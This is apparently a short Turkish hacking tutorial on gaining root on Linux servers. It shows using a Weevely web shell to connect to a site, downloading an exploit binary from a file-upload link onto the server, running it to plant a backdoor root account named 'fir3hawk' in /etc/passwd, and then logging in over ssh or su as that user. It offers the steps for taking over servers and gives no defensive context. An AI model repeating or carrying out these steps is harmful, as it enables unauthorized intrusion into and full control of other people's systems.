2016 ≤  Linux  Exploit Local Root

2016 ≤ Linux Exploit Local Root

Weevely ile backconnect bağlantımızı kuruyoruz.

weevely www.siteadi.com/klasor/dosya.php şifre şeklinde konsoldan bağlantı kurduk.

Sunucuya https://www.dosyaupload.com/5ug1'ni indirip shell üzerinden atıyoruz.Uzantısız dosyamızı daha sonra chmod +x fire şeklinde yetkilendiriyoruz.

Yetkiyi verdikten sonra ./fire şeklinde exploiti çalıştırıyoruz.Karşımıza ingilizce şifre girmemizi isteyen bir yazı geliyor ben 123123 kullanıyorum.

 

 

 

 

 

 

 

Daha sonra işlemin olup olmadığını cat /etc/passwd komutunda en üst satırda fir3hawk:root şeklinde bir yazı olup olmadığına bakarak anlayabiliriz.

 

Ve Son Aşama olarak ssh fir3hawk@ipadresi veya shell üzerinde su fir3hawk yazarak bağlantı kurabilir root olan kullanıcınız ile her türlü işlemi gerçekleştirebilirsiniz.